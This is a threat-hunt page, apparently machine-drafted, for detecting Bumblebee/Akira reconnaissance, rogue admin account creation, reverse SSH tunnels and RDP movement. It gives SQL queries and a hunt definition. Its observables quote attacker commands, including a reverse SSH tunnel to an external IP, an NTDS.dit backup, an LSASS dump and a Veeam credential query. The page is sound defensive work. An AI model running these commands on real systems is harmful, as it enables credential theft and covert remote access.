← All hunts high TLP:CLEAR Part 2 of 3

Bumblebee Reconnaissance and Privileged Persistence

An intruder is performing domain discovery and establishing privileged persistence by creating rogue administrator accounts and external SSH tunnels from compromised systems.

Based on research by The DFIR Report 2026-09-20 12 steps · 5 queries T1021.001 T1069.002 T1082 T1087.002 T1133 T1136.002 T1572

Brief

Why this hunt matters

The DFIR Report published a case study, From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira, detailing a rapid escalation from initial access to domain-wide impact. The adversary moved from a SEO-poisoned lure to full environment control by establishing persistent, privileged accounts and external tunnels. This hunt focuses on that middle ground: the moment the attacker shifts from a single compromised host to a persistent network presence.

How the hunt flows

The hunt starts by scoping the environment for potential beachheads. A software inventory query identifies hosts where the adversary installed lure software, such as ManageEngine OpManager or various IP scanners. These systems serve as the primary focus for deeper investigation into the intrusion timeline.

Once the analyst identifies a scope, the hunt moves into a parallel analysis of process activity. One query searches for host and domain reconnaissance command sequences. It looks for the use of tools like nltest, systeminfo, and whoami specifically when used to map domain administrators or list domain controllers. Simultaneously, another query looks for the creation of rogue privileged accounts, specifically those following the 'backup_' naming convention seen in recent Akira campaigns.

After triaging the initial reconnaissance, the hunt pivots to investigate the mechanisms for external access and lateral movement. A network connection query searches for outbound connections from SSH or RustDesk processes. It specifically looks for traffic to known malicious IPs or the use of port 10400 for proxying. This surface identifies the tunnel the adversary uses to bypass perimeter defenses.

The final technical phase correlates these findings with authentication logs. The hunt tracks lateral movement by searching for sign-in events involving the rogue accounts identified in earlier steps. It follows these accounts as they log into domain controllers or other critical infrastructure via RDP. A final correlation step synthesizes the recon, account creation, and tunneling into a single intrusion path for analyst review.

What this hunt cannot see

This hunt has two primary blind spots. First, if the environment lacks visibility into domain controller authentication logs (specifically Event ID 4624), the lateral movement phase cannot track where the rogue accounts went. Second, while the hunt identifies the presence of an SSH tunnel, it cannot see the specific commands or data passing through the encrypted payload. The analyst must rely on endpoint process telemetry to infer the activity performed over the tunnel.

In this series

Steps

  1. Identify hosts with lure software

    Query · scoping

    Find systems where the malicious software installers were likely executed to scope the hunt.

    reads hb_software_inventorysql
    SELECT DISTINCT device_hostname FROM hb_software_inventory WHERE (LOWER(package_name) LIKE '%manageengine opmanager%' OR LOWER(package_name) LIKE '%axis camera%' OR LOWER(package_name) LIKE '%angry ip scanner%' OR LOWER(package_name) LIKE '%advanced ip scanner%')

    What a hit looks like. A list of hosts that have installed target software. These are likely initial beachheads.

  2. Host and domain reconnaissance

    Query · triage

    Find the specific sequence of discovery tools used to map domain admins and enterprise trust.

    reads hb_process_activitysql
    SELECT device_hostname, process_name, process_cmd_line, user_name, time FROM hb_process_activity WHERE (LOWER(process_name) LIKE '%\systeminfo.exe' OR LOWER(process_name) LIKE '%\nltest.exe' OR LOWER(process_name) LIKE '%\whoami.exe' OR LOWER(process_name) LIKE '%\net.exe' OR LOWER(process_name) LIKE '%\net1.exe') AND (LOWER(process_cmd_line) LIKE '%/groups%' OR LOWER(process_cmd_line) LIKE '%/dclist%' OR LOWER(process_cmd_line) LIKE '%domain admins%') AND ('{{scope_hosts}}' = '' OR instr(',' || '{{scope_hosts}}' || ',', ',' || device_hostname || ',') > 0) AND time >= datetime('now', '-{{lookback_days}} days')

    What a hit looks like. Multiple discovery commands executed within a narrow window on a single host.

  3. Privileged account creation

    Query · detection candidate

    Find rare or suspicious account creations used for domain persistence.

    reads hb_process_activitysql
    SELECT device_hostname, process_cmd_line, COUNT(DISTINCT device_hostname) AS host_count, MIN(time) AS first_seen FROM hb_process_activity WHERE (LOWER(process_name) LIKE '%\net.exe' OR LOWER(process_name) LIKE '%\net1.exe') AND (LOWER(process_cmd_line) LIKE '%/add%' OR LOWER(process_cmd_line) LIKE '%backup_%') AND ('{{scope_hosts}}' = '' OR instr(',' || '{{scope_hosts}}' || ',', ',' || device_hostname || ',') > 0) AND time >= datetime('now', '-{{lookback_days}} days') GROUP BY process_cmd_line, device_hostname HAVING host_count <= 2

    What a hit looks like. Commands creating privileged accounts that only appear on a single system.

  4. Triage discovery and accounts

    Agent triage

    Determine if discovery and account creation together confirm a beachhead foothold.

  5. SSH and RustDesk tunnels

    Query · enrichment

    Identify external persistence mechanisms, specifically reverse SSH tunnels or RustDesk connections.

    reads hb_network_connectionsql
    SELECT device_hostname, process_name, dst_endpoint_ip, dst_endpoint_port, time FROM hb_network_connection WHERE (LOWER(process_name) LIKE '%\ssh.exe' OR LOWER(process_name) LIKE '%\rustdesk.exe') AND (instr(',' || '{{tunnel_ips}}' || ',', ',' || dst_endpoint_ip || ',') > 0 OR dst_endpoint_port = 10400) AND time >= datetime('now', '-{{lookback_days}} days')

    What a hit looks like. Connections to known tunnel IPs or use of port 10400 for proxying.

  6. RDP movement using rogue accounts

    Query · enrichment

    Track lateral movement from beachheads to domain controllers using the new accounts.

    reads hb_auth_signinsql
    SELECT dst_endpoint_name, src_endpoint_ip, actor_user_name, time FROM hb_auth_signin WHERE (instr(',' || '{{backup_account_names}}' || ',', ',' || actor_user_name || ',') > 0 OR actor_user_name LIKE 'backup_%') AND activity_id = 1 AND time >= datetime('now', '-{{lookback_days}} days')

    What a hit looks like. Logons by rogue accounts to domain controllers or critical internal servers.

  7. Correlate full intrusion chain

    Agent triage

    Synthesize early discovery evidence with follow-on tunneling and lateral movement.

  8. Route on verdict

    Decision

    Make a decision based on the correlation agent results.

  9. Isolate compromised host

    Response action

    Sever the adversary connection to the network and prevent movement.

  10. Analyst review

    Analyst task

    Perform manual validation of the correlated findings.

  11. Close out

    Analyst task

    Finalize the hunt and record findings.

Coverage

Scenario coverage

StageCoveredHow, or why not
Host and Domain Reconnaissance
T1082 · T1087.002 · T1069.002
Yes discovery-activity
Privileged Account Creation
T1136.002
Yes account-persistence
Lateral Movement via RDP
T1021.001
Yes rdp-lateral-movement
Persistence and External Tunneling
T1133 · T1572
Yes external-tunneling
Initial Access via SEO Poisoning
T1189
Out of scope Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.
Bumblebee Loading and Execution
T1574.002 · T1204.002
Out of scope Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.
Bumblebee and Adaptix C2
T1071.001 · T1568.002
Out of scope Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.
NTDS.dit Extraction
T1003.003
Out of scope Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.
Database and Memory Credential Theft
T1003.001 · T1555
Out of scope Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.
Data Exfiltration via FileZilla
T1048.003
Out of scope Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.
Akira Ransomware Deployment
T1486
Out of scope Belongs to another part of the 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira' series.

Blind spots

  • Needs hb_auth_signin populated with Event ID 4624 from all DCs. Without DC logon visibility, lateral movement using newly created domain admins cannot be tracked. It would answer whether the rogue account logged into specific domain controllers.
  • Needs Network proxy or SSL inspection of port 22/10400. Adversary actions inside an encrypted tunnel are hidden from network inspection. It would answer what commands were sent over the reverse SSH tunnel.

Parameters & data

Parameters

ParameterTypeDefaultWhat it is
backup_account_nameslist[string]backup_DA, backup_EAAdversary-created privileged account names observed in the campaign.
lookback_daysnumber14Days of history to examine.
scope_hostslist[host]Limit analysis to specific hosts found during scoping; leave empty to scan all hosts.
tunnel_ipslist[ip]193.242.184.150, 83.229.17.60, 185.174.100.203Known external IPs used for SSH tunnels or exfiltration.

Telemetry

SourceCategoryTelemetry
Endpoint telemetry (hb_ surfaces)endpointendpoint
Identity / sign-in telemetryidentityidentity
Network telemetrynetworknetwork

Source

Download hunt.md Definition (JSON) An open hunt.md file; it runs anywhere that reads the format.
---
analysis: While single rules might alert on account creation, this hunt correlates
  that event with preceding domain discovery and subsequent RDP movement and SSH tunneling
  across three different telemetry surfaces.
blind_spots:
- id: domain-controller-logs-missing
  question: whether the rogue account logged into specific domain controllers
  requires: hb_auth_signin populated with Event ID 4624 from all DCs
  risk: Without DC logon visibility, lateral movement using newly created domain admins
    cannot be tracked.
  stage: lateral-movement-rdp
- id: ssh-tunnel-payload-blindness
  question: what commands were sent over the reverse SSH tunnel
  requires: Network proxy or SSL inspection of port 22/10400
  risk: Adversary actions inside an encrypted tunnel are hidden from network inspection.
  stage: persistence-and-tunneling
coverage:
- stage: discovery-host-and-domain
  status: covered
  steps:
  - discovery-activity
- stage: persistence-domain-account-creation
  status: covered
  steps:
  - account-persistence
- stage: lateral-movement-rdp
  status: covered
  steps:
  - rdp-lateral-movement
- stage: persistence-and-tunneling
  status: covered
  steps:
  - external-tunneling
- reason: 'Belongs to another part of the ''Flash Alert: From Bing Search to Ransomware:
    Bumblebee and AdaptixC2 Deliver Akira'' series.'
  stage: initial-access-seo-poisoning
  status: out_of_scope
- reason: 'Belongs to another part of the ''Flash Alert: From Bing Search to Ransomware:
    Bumblebee and AdaptixC2 Deliver Akira'' series.'
  stage: execution-malware-loading
  status: out_of_scope
- reason: 'Belongs to another part of the ''Flash Alert: From Bing Search to Ransomware:
    Bumblebee and AdaptixC2 Deliver Akira'' series.'
  stage: command-and-control-bumblebee-adaptix
  status: out_of_scope
- reason: 'Belongs to another part of the ''Flash Alert: From Bing Search to Ransomware:
    Bumblebee and AdaptixC2 Deliver Akira'' series.'
  stage: credential-access-ntds-dump
  status: out_of_scope
- reason: 'Belongs to another part of the ''Flash Alert: From Bing Search to Ransomware:
    Bumblebee and AdaptixC2 Deliver Akira'' series.'
  stage: credential-access-postgre-lsass
  status: out_of_scope
- reason: 'Belongs to another part of the ''Flash Alert: From Bing Search to Ransomware:
    Bumblebee and AdaptixC2 Deliver Akira'' series.'
  stage: exfiltration-sftp
  status: out_of_scope
- reason: 'Belongs to another part of the ''Flash Alert: From Bing Search to Ransomware:
    Bumblebee and AdaptixC2 Deliver Akira'' series.'
  stage: impact-akira-ransomware
  status: out_of_scope
guardrails:
  claims: no_unsupported
  evidence: citation_required
  missing_data: not_benign
  telemetry: untrusted
hunt:
  applicability: campaign-specific
  handoff: keep-as-periodic-hunt
  justification: Establishment of rogue domain admins and external tunnels represents
    a critical path to environment compromise. A negative result confirms these persistence
    vectors are not active.
  methodology: model-assisted
  trigger: intel-report
hypothesis: An intruder is performing domain discovery and establishing privileged
  persistence by creating rogue administrator accounts and external SSH tunnels from
  compromised systems.
labels:
- hunt
- attack.t1082
- attack.t1087.002
- attack.t1069.002
- attack.t1136.002
- attack.t1021.001
- attack.t1133
- attack.t1572
name: Bumblebee Reconnaissance and Privileged Persistence
parameters:
  backup_account_names:
    default:
    - backup_DA
    - backup_EA
    description: Adversary-created privileged account names observed in the campaign.
    from:
      kind: article
      observed: '2025-08-05'
      ref: dfir-report-bumblebee-akira
    type: list[string]
  lookback_days:
    default: '14'
    description: Days of history to examine.
    type: number
  scope_hosts:
    default: []
    description: Limit analysis to specific hosts found during scoping; leave empty
      to scan all hosts.
    type: list[host]
  tunnel_ips:
    default:
    - 193.242.184.150
    - 83.229.17.60
    - 185.174.100.203
    description: Known external IPs used for SSH tunnels or exfiltration.
    from:
      kind: article
      observed: '2025-08-05'
      ref: dfir-report-bumblebee-akira
    type: list[ip]
provenance:
  authors:
  - name: Huntbase hunt generation
    org: huntbase.io
  generated:
    by: huntbase-hunt-generation
    from: https://thedfirreport.com/2025/08/05/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2/
    gates:
    - dry-run
    - lint
    model: hb_google/gemini-3-flash-preview
rationale: The hunt begins by identifying hosts that installed software lures mentioned
  in the research. It then focuses on servers and domain controllers where privileged
  accounts would be most active.
references:
- name: "The DFIR Report \u2014 From Bing Search to Ransomware: Bumblebee and AdaptixC2\
    \ Deliver Akira"
  url: https://thedfirreport.com/2025/08/05/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2/
related:
- hunt: bumblebee-initial-access-seo
  reason: Initial access via SEO poisoning leads to the reconnaissance and persistence
    seen here.
  relation: precedes
- hunt: akira-ransomware-impact
  reason: Successful persistence and discovery are prerequisites for final ransomware
    deployment.
  relation: follows
- hunt: bumblebee-seo-poisoning-sideloading
  relation: follows
scenario:
  stages:
  - name: Initial Access via SEO Poisoning
    observables:
    - opmanager.pro
    - ManageEngine-OpManager.msi
    - angryipscanner.org
    - axiscamerastation.org
    - ip-scanner.org
    slug: initial-access-seo-poisoning
    tactic: initial-access
    techniques:
    - T1189
  - name: Bumblebee Loading and Execution
    observables:
    - msiexec.exe
    - consent.exe
    - msimg32.dll
    - 186b26df63df3b7334043b47659cba4185c948629d857d47452cc1936f0aa5da
    - a6df0b49a5ef9ffd6513bfe061fb60f6d2941a440038e2de8a7aeb1914945331
    slug: execution-malware-loading
    tactic: execution
    techniques:
    - T1574.002
    - T1204.002
  - name: Bumblebee and Adaptix C2
    observables:
    - 109.205.195.211
    - 188.40.187.145
    - 172.96.137.160
    - ev2sirbd269o5j.org
    - 2rxyt9urhq0bgj.org
    - AdgNsy.exe
    slug: command-and-control-bumblebee-adaptix
    tactic: command-and-control
    techniques:
    - T1071.001
    - T1568.002
  - name: Host and Domain Reconnaissance
    observables:
    - systeminfo
    - 'nltest /dclist:'
    - whoami /groups
    - net group "domain admins" /dom
    slug: discovery-host-and-domain
    tactic: discovery
    techniques:
    - T1082
    - T1087.002
    - T1069.002
  - name: Privileged Account Creation
    observables:
    - net user backup_DA
    - net user backup_EA
    - net group "Enterprise Administrators" backup_EA /add
    slug: persistence-domain-account-creation
    tactic: persistence
    techniques:
    - T1136.002
  - name: Lateral Movement via RDP
    observables:
    - backup_EA
    slug: lateral-movement-rdp
    tactic: lateral-movement
    techniques:
    - T1021.001
  - name: NTDS.dit Extraction
    observables:
    - wbadmin.exe start backup -backuptarget:\\127.0.0.1\C$\ProgramData\ -include:"C:\windows\NTDS\ntds.dit"
    - ntds.dit
    slug: credential-access-ntds-dump
    tactic: credential-access
    techniques:
    - T1003.003
  - name: Persistence and External Tunneling
    observables:
    - RustDesk
    - ssh root@193.242.184.150 -R *:10400
    - 83.229.17.60
    slug: persistence-and-tunneling
    tactic: persistence
    techniques:
    - T1133
    - T1572
  - name: Database and Memory Credential Theft
    observables:
    - psql.exe -U postgres -d VeeamBackup -c "SELECT user_name,password FROM credentials"
    - 'rundll32.exe C:\windows\System32\comsvcs.dll, #+000024'
    slug: credential-access-postgre-lsass
    tactic: credential-access
    techniques:
    - T1003.001
    - T1555
  - name: Data Exfiltration via FileZilla
    observables:
    - FileZilla
    - 185.174.100.203
    slug: exfiltration-sftp
    tactic: exfiltration
    techniques:
    - T1048.003
  - name: Akira Ransomware Deployment
    observables:
    - locker.exe
    - win.exe
    - de730d969854c3697fd0e0803826b4222f3a14efe47e4c60ed749fff6edce19d
    slug: impact-akira-ransomware
    tactic: impact
    techniques:
    - T1486
  summary: Threat actors utilized SEO poisoning for 'ManageEngine OpManager' to deliver
    Bumblebee malware, which dropped AdaptixC2 for post-exploitation. The intrusion
    involved domain account creation, NTDS.dit dumping via wbadmin, and lateral movement
    to a backup server before exfiltrating data and deploying Akira ransomware.
series:
  index: 2
  slug: flash-alert-from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira
  title: 'Flash Alert: From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver
    Akira'
  total: 3
severity: high
targets:
  analyst:
    name: Tier-2 analyst
    role: analyst
  endpoint:
    category: endpoint
    name: Endpoint telemetry (hb_ surfaces)
    telemetry:
    - endpoint
  hunter:
    agent: true
    name: Hunt agent
  identity:
    category: identity
    name: Identity / sign-in telemetry
    telemetry:
    - identity
  network:
    category: network
    name: Network telemetry
    telemetry:
    - network
tlp: clear
type: investigation
---


# Bumblebee Reconnaissance and Privileged Persistence

This hunt identifies the post-compromise activity of Bumblebee and AdaptixC2, focusing on the critical transition from initial access to full domain control. It examines host and domain reconnaissance command sequences, the creation of privileged backup accounts, and the subsequent use of these accounts for RDP lateral movement and external persistence via RustDesk or SSH tunnels. Following a phased approach, the hunt correlates discovery noise with high-fidelity persistence indicators to confirm a network-wide intrusion.

## scoping-lure-software
<!-- Identify hosts with lure software -->
Find systems where the malicious software installers were likely executed to scope the hunt.

```sqlite target=endpoint role=scoping
~~~yaml
expected: A list of hosts that have installed target software. These are likely initial
  beachheads.
reads:
- device_hostname
- package_name
- vendor_name
silence: not_evidence_of_absence
source: hb_software_inventory
verified: dry-run
verified_at: '2026-09-20'
~~~
SELECT DISTINCT device_hostname FROM hb_software_inventory WHERE (LOWER(package_name) LIKE '%manageengine opmanager%' OR LOWER(package_name) LIKE '%axis camera%' OR LOWER(package_name) LIKE '%angry ip scanner%' OR LOWER(package_name) LIKE '%advanced ip scanner%')
```

## early-stage-parallel
<!-- Analyze early stage reconnaissance -->
parallel:
- → discovery-activity
- → account-persistence
join: → triage-early-stage

## discovery-activity
<!-- Host and domain reconnaissance -->
Find the specific sequence of discovery tools used to map domain admins and enterprise trust.

```sqlite target=endpoint role=triage params=(lookback_days=lookback_days, scope_hosts=scope_hosts)
~~~yaml
expected: Multiple discovery commands executed within a narrow window on a single
  host.
reads:
- device_hostname
- process_name
- process_cmd_line
- user_name
- time
silence: not_evidence_of_absence
source: hb_process_activity
verified: dry-run
verified_at: '2026-09-20'
~~~
SELECT device_hostname, process_name, process_cmd_line, user_name, time FROM hb_process_activity WHERE (LOWER(process_name) LIKE '%\systeminfo.exe' OR LOWER(process_name) LIKE '%\nltest.exe' OR LOWER(process_name) LIKE '%\whoami.exe' OR LOWER(process_name) LIKE '%\net.exe' OR LOWER(process_name) LIKE '%\net1.exe') AND (LOWER(process_cmd_line) LIKE '%/groups%' OR LOWER(process_cmd_line) LIKE '%/dclist%' OR LOWER(process_cmd_line) LIKE '%domain admins%') AND ('{{scope_hosts}}' = '' OR instr(',' || '{{scope_hosts}}' || ',', ',' || device_hostname || ',') > 0) AND time >= datetime('now', '-{{lookback_days}} days')
```

## account-persistence
<!-- Privileged account creation -->
Find rare or suspicious account creations used for domain persistence.

```sqlite target=endpoint role=detection-candidate params=(lookback_days=lookback_days, scope_hosts=scope_hosts)
~~~yaml
baseline:
  compare: first_seen
  window: '{{lookback_days}}d'
expected: Commands creating privileged accounts that only appear on a single system.
prevalence:
  by: device_hostname
  key:
  - process_cmd_line
  rare_below: 3
reads:
- process_cmd_line
- device_hostname
- time
silence: not_evidence_of_absence
source: hb_process_activity
verified: dry-run
verified_at: '2026-09-20'
~~~
SELECT device_hostname, process_cmd_line, COUNT(DISTINCT device_hostname) AS host_count, MIN(time) AS first_seen FROM hb_process_activity WHERE (LOWER(process_name) LIKE '%\net.exe' OR LOWER(process_name) LIKE '%\net1.exe') AND (LOWER(process_cmd_line) LIKE '%/add%' OR LOWER(process_cmd_line) LIKE '%backup_%') AND ('{{scope_hosts}}' = '' OR instr(',' || '{{scope_hosts}}' || ',', ',' || device_hostname || ',') > 0) AND time >= datetime('now', '-{{lookback_days}} days') GROUP BY process_cmd_line, device_hostname HAVING host_count <= 2
```

## triage-early-stage
<!-- Triage discovery and accounts -->
```agent target=hunter
cite: required
context:
- discovery-activity
- account-persistence
max_iterations: 4
objective: Determine if discovery tools and net user modifications indicate an adversary
  establishing a foothold.
success_criteria: A list of suspicious hosts with associated malicious accounts.
tools:
- endpoint
- identity
- network
```

## follow-on-parallel
<!-- Analyze tunneling and movement -->
parallel:
- → external-tunneling
- → rdp-lateral-movement
join: → intrusion-correlation

## external-tunneling
<!-- SSH and RustDesk tunnels -->
Identify external persistence mechanisms, specifically reverse SSH tunnels or RustDesk connections.

```sqlite target=network role=enrichment params=(lookback_days=lookback_days, tunnel_ips=tunnel_ips)
~~~yaml
expected: Connections to known tunnel IPs or use of port 10400 for proxying.
reads:
- device_hostname
- process_name
- dst_endpoint_ip
- dst_endpoint_port
- time
silence: not_evidence_of_absence
source: hb_network_connection
verified: dry-run
verified_at: '2026-09-20'
~~~
SELECT device_hostname, process_name, dst_endpoint_ip, dst_endpoint_port, time FROM hb_network_connection WHERE (LOWER(process_name) LIKE '%\ssh.exe' OR LOWER(process_name) LIKE '%\rustdesk.exe') AND (instr(',' || '{{tunnel_ips}}' || ',', ',' || dst_endpoint_ip || ',') > 0 OR dst_endpoint_port = 10400) AND time >= datetime('now', '-{{lookback_days}} days')
```

## rdp-lateral-movement
<!-- RDP movement using rogue accounts -->
Track lateral movement from beachheads to domain controllers using the new accounts.

```sqlite target=identity role=enrichment params=(lookback_days=lookback_days, backup_account_names=backup_account_names)
~~~yaml
expected: Logons by rogue accounts to domain controllers or critical internal servers.
reads:
- dst_endpoint_name
- src_endpoint_ip
- actor_user_name
- time
silence: not_evidence_of_absence
source: hb_auth_signin
verified: dry-run
verified_at: '2026-09-20'
~~~
SELECT dst_endpoint_name, src_endpoint_ip, actor_user_name, time FROM hb_auth_signin WHERE (instr(',' || '{{backup_account_names}}' || ',', ',' || actor_user_name || ',') > 0 OR actor_user_name LIKE 'backup_%') AND activity_id = 1 AND time >= datetime('now', '-{{lookback_days}} days')
```

## intrusion-correlation
<!-- Correlate full intrusion chain -->
```agent target=hunter
cite: required
context:
- triage-early-stage
- external-tunneling
- rdp-lateral-movement
max_iterations: 6
objective: Identify hosts and accounts involved in the full Bumblebee intrusion chain
  by connecting recon to privileged persistence and tunneling.
success_criteria: A final verdict of malicious for any host showing recon followed
  by account creation and lateral movement.
tools:
- endpoint
- identity
- network
```

## route-on-verdict
<!-- Route on verdict -->
if~: "the intrusion-correlation verdict is malicious for at least one host or account" (confidence: high, judge=hunter)
then: → isolate-compromised-host
indeterminate: → analyst-review
unavailable: → analyst-review (blind_spot: domain-controller-logs-missing)
else: → close-out

## isolate-compromised-host
<!-- Isolate compromised host -->
```action target=endpoint
~~~yaml
approval: required
~~~
Isolate the compromised beachhead host and any destination systems targeted by the rogue accounts. Disable identified backup_ accounts in Active Directory.
```
→ analyst-review

## analyst-review
<!-- Analyst review -->
```manual target=analyst
Review the correlated intrusion timeline. Confirm the source of the initial compromise on beachhead hosts and verify the status of rogue accounts.
```
→ close-out

## close-out
<!-- Close out -->
```manual target=analyst
Record what was examined, what was not visible, and whether to schedule a re-run of this phased hunt.
```
→ end

Run it

Take this hunt into your environment.

Open it in Huntbase to run every step against your own connections, with Scout weighing the evidence and your analysts in command. Or take the open hunt.md file anywhere that reads the format.

Machine-drafted by huntbase-hunt-generation using hb_google/gemini-3-flash-preview, gated by dry-run, lint, then reviewed by a person.